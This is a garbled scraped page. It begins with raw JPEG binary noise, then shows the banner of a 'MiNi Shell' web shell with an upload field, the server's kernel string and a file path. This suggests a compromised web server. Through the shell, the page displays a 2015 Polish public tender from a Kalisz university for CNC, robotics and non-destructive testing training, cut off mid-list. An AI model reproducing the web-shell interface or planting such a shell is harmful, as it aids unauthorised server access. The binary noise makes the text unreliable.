JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150728/112637-N-2015.html

<p class="kh_header"><b>Kalisz: Przeprowadzenie zaawansowanych specjalistycznych szkoleń dla studentów Wydziału Politechnicznego Państwowej Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego  w Kaliszu, w ramach projektu Mechanika i budowa maszyn - profesjonalny start do Twojej kariery !</b><br>
<b>Numer ogłoszenia: 112637 - 2015; data zamieszczenia: 28.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu , ul. Nowy Świat 4, 62-800 Kalisz, woj. wielkopolskie, tel. 62 767 95 00, 767 95 32, faks 62 767 95 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zaawansowanych specjalistycznych szkoleń dla studentów Wydziału Politechnicznego Państwowej Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego  w Kaliszu, w ramach projektu Mechanika i budowa maszyn - profesjonalny start do Twojej kariery !.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest  przeprowadzenie zaawansowanych specjalistycznych 
            szkoleń  dla studentów Wydziału  Politechnicznego Państwowej Wyższej  Szkoły
            Zawodowej im. Prezydenta Stanisława Wojciechowskiego  w Kaliszu, w ramach 
             projektu -Mechanika i budowa maszyn  - profesjonalny start do Twojej kariery!. 
           Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu  
           Społecznego ( 85 %). Program Operacyjny Kapitał Ludzki, Priorytet IV, Działanie 4.1, 
           Poddziałanie 4.1.2.
                                Zamówienie składa się z  3 części (zadań), z podziałem na:
             Zadanie nr 1 - programowanie obrabiarek CNC - programowanie i obsługa  pionowego 
                                      centrum obróbkowego DMC 635V ze sterowaniem Heidenhain
     Zadanie  nr 2 - programowanie i obsługa robotów przemysłowych
	 Zadanie nr 3  -  badania nieniszczące metodą MPM I stopnia
2.Dodatkowe informacje : 
 2.1 Zamawiający może udostępnić Wykonawcy  - dla zadania nr 3  nieodpłatnie sale
                          wykładowe spełniające odpowiednie wymagania ( np. ekrany , rzutniki itp.) i sale
                          komputerowe  z  odpowiednią  liczbą stanowisk i dostępem do  Internetu, oraz inne 
                          niezbędne sale dydaktyczne ( np. laboratoria), wg potrzeb.
2.2 Zamawiający udostępni Wykonawcy- pełne listy uczestników szkoleń , w terminie 2 
dni przed uzgodnionym rozpoczęciem  zajęć w każdej grupie.      
         3.5.3. Wykonawca zobowiązany jest  do :
a)	terminowego, zgodnego  z podanym przez Zamawiającego harmonogramie  
      rozpoczęcia i kończenia  zajęć (w czasie wyznaczonym przez opiekuna projektu),                     
                     b) powiadamiania Zamawiającego ( opiekuna projektu) z co najmniej 1-dniowym
                           wyprzedzeniem o wszelkich odstępstwach od ustalonego harmonogramu szkoleń 
                          oraz terminach zajęć zastępczych, zaś w przypadku nieobecności niemożliwych do 
                          przewidzenia - natychmiastowego informowania o nich Zamawiającego,
                      c) zapewnienia właściwej kadry wykładowej do przeprowadzenia szkoleń,
                      d) przekazywanie dokumentów i informacji uczestnikom szkoleń na polecenie 
                          personelu zarządzającego projektem.
                      e) prowadzenia dokumentacji szkolenia , a w szczególności list obecności 
                          uczestników szkoleń,
                      f) na wezwanie Zamawiającego zobowiązany jest również  do przeprowadzenia 
                    wśród uczestników szkoleń dodatkowych ankiet, dostarczonych przez  Zamawiającego.

      3. Wszystkie koszty dodatkowe, związane z dojazdem, noclegiem i utrzymaniem     
              wykładowców (trenerów), pokryje Wykonawca.

      4. Zamawiający  zastrzega  możliwość  zmniejszenia liczby uczestników  szkolenia ( dotyczy 
              wszystkich zadań) z przyczyn losowych.  Zmiany te Wykonawca uwzględni w fakturze. 
             Wykonawca będzie realizował  zamówienie po cenie jednostkowej  dla jednej osoby 
              zawartej w ofercie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga w niniejszym postępowaniu wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  precyzuje w tym
           zakresie żadnych wymagań, których spełnianie Wykonawca  zobowiązany jest wykazać 
           w sposób szczególny. Zamawiający dokona oceny  spełnienia warunków udziału w 
           postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą
          oświadczenia o spełnianiu warunków udziału w  postępowaniu, o którym mowa w pkt.
           9.1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  precyzuje w tym
           zakresie żadnych wymagań, których spełnianie Wykonawca  zobowiązany jest wykazać 
           w sposób szczególny. Zamawiający dokona oceny  spełnienia warunków udziału w 
           postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą
          oświadczenia o spełnianiu warunków udziału w  postępowaniu, o którym mowa w pkt.
           9.1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  precyzuje w tym
           zakresie żadnych wymagań, których spełnianie Wykonawca  zobowiązany jest wykazać 
           w sposób szczególny. Zamawiający dokona oceny  spełnienia warunków udziału w 
           postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą
          oświadczenia o spełnianiu warunków udziału w  postępowaniu, o którym mowa w pkt.
           9.1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  winien  dysponować minimum 2 
         osobami ( dla każdego zadania) zdolnymi do wykonania zamówienia.     
 
          Wymagania dotyczące osób zdolnych do wykonania przedmiotu zamówienia (trenerów) :
                         a)  specjaliści ze znajomością  zastosowań nowych technik i technologii,
                         b) posiadający doświadczenie zawodowe tj. przeprowadził w przeciągu ostatnich 3 lat,
                             min. 2 szkolenia w dziedzinie związanej z tematyką prowadzonego szkolenia,
c) co najmniej jeden z nich współpracuje lub działa w instytucjach uprawnionych do
    wydawania  certyfikatu  kwalifikacyjnego / świadectwa  ukończenia kursu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w
            sposób szczególny. Zamawiający dokona oceny  spełnienia warunków udziału 
     w postępowaniu w tym zakresie na podstawie  złożonego przez Wykonawcę wraz 
     z ofertą oświadczenia o spełnianiu warunków  udziału w  postępowaniu, o którym
      mowa w pkt. 9.1.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty- wzór stanowi załącznik do SIWZ;
 2. W przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
      o którym  mowa w ppkt. 10.2. lit.b lub ppkt.10.9 SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana postanowień zawartej umowy może nastąpić na podstawie art. 144 ust.1 ustawy, za 
    zgodą obu stron , wyrażoną  na piśmie  w formie  aneksu do umowy, pod rygorem nieważności 
    takiej zmiany i może zostać dokonana,  o ile nie stoi w sprzeczności z regulacjami zawartymi 
     w  ustawie Prawo zamówień publicznych.     
 2. Zamawiający przewiduje możliwość  zmian postanowień zawartej umowy stosunku do treści 
     oferty, na  podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co
     najmniej jednej z okoliczności wskazanych poniżej, z uwzględnieniem podawanych 
     warunków ich wprowadzenia :
     a) zmiana terminu płatności- w przypadku: 
       - ograniczenia finansowego po stronie Zamawiającego, z przyczyn od niego niezależnych 
      b) zmiana w sposobie realizacji zamówienia polegająca na: zmianie osób, podwykonawców,   
          partnerów konsorcjum i innych podmiotów współpracujących przy realizacji zamówienia pod 
          warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są 
          gorsze od tych, jakie posiadają podmioty zamieniane. Zmiany te mogą nastąpić z przyczyn 
          organizacyjnych. 
    c) zmiana wynagrodzenia: 
      - z przyczyn , o których mowa w § 1 ust.6 niniejszej umowy
 
       - zmiana urzędowej stawki podatku VAT.     
3. Wystąpienie którejkolwiek z wymienionych powyżej okoliczności nie stanowi bezwzględnego  
     zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy 
     roszczeń Wykonawcy do ich dokonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.kalisz.pl /biuletyn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła  Zawodowa  im. Prezydenta Stanisława  Wojciechowskiego 
w Kaliszu, z siedzibą przy ul. Nowy Świat 4,  62-800 Kalisz  
Dział Techniczny - u. Nowy Świat 5 , I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2015 godzina 11:00, miejsce: Państwowa Wyższa Szkoła  Zawodowa  im. Prezydenta Stanisława  Wojciechowskiego 
w Kaliszu, z siedzibą przy ul. Nowy Świat 4,  62-800 Kalisz  
Dział Techniczny - u. Nowy Świat 5 , I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Programowanie obrabiarek CNC - programowanie i obsługa pionowego centrum obróbkowego DMC 635V ze sterowaniem Heidenhain.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Szkolenie dla 24 osób w podziale  na 3 grupy szkoleniowe - do 8 osób każda.     
            2) Termin realizacji zamówienia - codziennie  ( 10 dni po 8 godz. lekcyjnych dla każdej
                 grupy)   w dniach:
     -  od 7 do 18 września 2015 r., dla I i II grupy (II- w godzinach popołudniowych),
     -  od 21 września do 2 października 2015 r., dla III grupy.
             3) Wymagana liczba godzin szkolenia przypadająca na jednego uczestnika : 80 godz.  
             4) Miejsce szkolenia - w placówce mającej swoją siedzibę w odległości do 30 km od 
                 Kalisza, powyżej tej odległości koszty przejazdu studentów pokrywa Wykonawca.
             5) Wykonawca zapewni materiały szkoleniowe , w ramach ceny zawartej w ofercie. 
	        6) Celem kursu ( szkolenia) jest nabycie przez uczestników kwalifikacji zawodowych w
                  obrębie zawodu  Operator  obrabiarek skrawających 722[02] w zakresie 
                   programowania i obsługi pionowego centrum obróbkowego DMC 635V 
                   z zastosowaniem sterowania HEIDENHAIN . Cel ten musi zostać osiągnięty
                   poprzez odbycie zajęć praktycznych  w liczbie  80 godzin z zakresu programowania
                   i obsługi tej maszyny.
               7) szkolenie musi zostać przeprowadzone zgodnie z programem szkolenia obejmującym 
                   następujące zagadnienia :
                   -charakterystyka pionowego centrum obróbkowego DMC 635V z układem sterowania 
                     HEIDENHAIN ,
                  - obsługa pionowego centrum obróbkowego DMC 635 V z układem sterowania 
	             HEIDENHAIN TNC 530,
                - tworzenie programu obróbki z wykorzystaniem funkcji i cykli obróbkowych,
                - zastosowanie parametrów Q  w pisaniu programu obróbki,
                - wykorzystanie  funkcji matematycznych do tworzenia programów,
                - pisanie programu z zastosowaniem pętli i funkcji logicznych,
                - wykonywanie gotowego wyrobu wg rysunku.
	       8) Wykonawca musi zapewnić wykładowcę/wykładowców o kwalifikacjach adekwatnych 
                   do zakresu przedmiotu zamówienia. 
9)	Wykonawca musi zapewnić realizację kursu w wyodrębnionej pracowni CNC wyposażonej w :
      - pionowe centrum obróbkowe DMC 635V  pracujące w 3 osiach programowalnych, 
        z oprogramowaniem pozwalającym  na projektowanie i symulowanie w 3D 
         z systemem sterowania HEIDENHAIN ,
      - min 8 stanowisk komputerowych zintegrowanych  z maszyną z oprogramowaniem do
         symulowania w 3D z systemem sterowania HEIDENHAIN ,
       - panele programowalne (symulacja systemu Heidenhain),
       - projektor multimedialny z ekranem stojącym,
       - instrukcje 
 
10). Po zakończonym kursie Wykonawca każdemu uczestnikowi wystawi odpowiednie
       dokumenty kwalifikacyjne w postaci :
       - Zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych w obrębie 
          zawodu, wydanego na podstawie § 8 ust.1,2 Rozporządzenia Ministra Edukacji 
          i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby 
          dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach
          pozaszkolnych, zgodnie ze wzorem stanowiącym Załącznik Nr 2 do Rozporządzenia 
          ( podstawa : Dz.U. nr 31, poz. 216 z 2006 r),
       - Certyfikatu z wyszczególnioną liczba godzin oraz programem szkolenia, język polski,
       - Certyfikatu j.w. w języku angielskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Programowanie i obsługa robotów przemysłowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Szkolenie dla 24 osób w podziale  na  3 grupy szkoleniowe - do 8 osób każda. 
     Każdy uczestnik przejdzie szkolenie teoretyczne 
      - 2 dni wszyscy uczestnicy  i szkolenie praktyczne na dwóch typach robotów
         przemysłowych IRp-6 i FANUC
       - 1,5 dnia - grupa max. 5-cio osobowa na jednym robocie,
       - 1,5 dnia - grupa max. 5-cio osobowa na drugim robocie.
2)	Termin realizacji zamówienia , codziennie ( 5 dni x 8 godz. lekcyjnych dla każdej grupy) w dniach: 
      - od 7 do 11 września 2015 r., dla I grupy,
      - od 14 do 18 września 2015 r., dla II grupy, w godzinach popołudniowych 
      - od 21 do 25 września 2015 r., dla III grupy, w godzinach popołudniowych. 
             3) Wymagana liczba godzin szkolenia przypadająca na jednego uczestnika :  40 godz.
             4) Miejsce szkolenia - w placówce mającej swoja siedzibę w odległości do 30 km od 
                 Kalisza, powyżej tej odległości koszty przejazdu studentów pokrywa Wykonawca.
             5) Wykonawca zapewni materiały szkoleniowe , w ramach ceny zawartej w ofercie. 
   6) Celem szkolenia  jest dostarczenie  podstawowej wiedzy z zakresu programowania
       robotów przemysłowych. Podczas szkolenia uczestnik będzie miał możliwość poznania 
       instrukcji języka programowania,  tak na poziomie podstawowym , 
       jak i zaawansowaniem, wraz z praktycznymi przykładami. Etapem  wieńczącym
       szkolenie jest samodzielnie napisany program wymagający wykorzystania zdobytej 
       wiedzy podczas szkolenia.
               7) Świadectwo ukończenia kursu z wyszczególnioną liczbą godzin oraz programem
                   szkolenia.
              8) Przeprowadzenie egzaminu po ukończonym szkoleniu przez uprawnione osoby,
                  w tym przewodniczący komisji egzaminacyjnej ze  stopniem naukowym minimum 
                  doktor nauk  technicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> badania nieniszczące metodą MPM I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3  -  badania nieniszczące metodą MPM I stopnia

1)	Szkolenie dla 24 osób w podziale  na 2 grupy szkoleniowe w godz. 7:30 - 13:30 (gr. I)
      i 14:30 - 21:00 (gr. II) - każda grupa podzielona na 2 podgrupy po  6 osób każda.
            2) Termin realizacji zamówienia : codziennie w dniach od 21 września do 2 października 

 
                2015 r. ( 10 dni  x 8godz. lekcyjnych dla jednej  grupy) , w tym  egzamin kwalifikacyjny 
                 z podziałem na  część  teoretyczną i praktyczną,  
3)	Wymagana liczba godzin szkolenia przypadająca na jednego uczestnika: 80 godz.
      lekcyjnych z egzaminem, 
4)	Szkolenie teoretyczne z zakresu metody magnetycznej pamięci metalu, w tym: 
     - wprowadzenie do badań nieniszczących z omówieniem istniejących metod,
     - podstawy fizyczne pomiaru pola magnetycznego,
     - podstawowe zjawiska fizyczne z zakresu magnetyzmu,
     - charakterystyka materiałów ferromagnetycznych,
     - omówienie pojęcia strefa koncentracji naprężeń,
     - klasyfikacja otrzymanych wskazań,
     - omówienie  obowiązującej normy PN-ISO 24497:1-3.
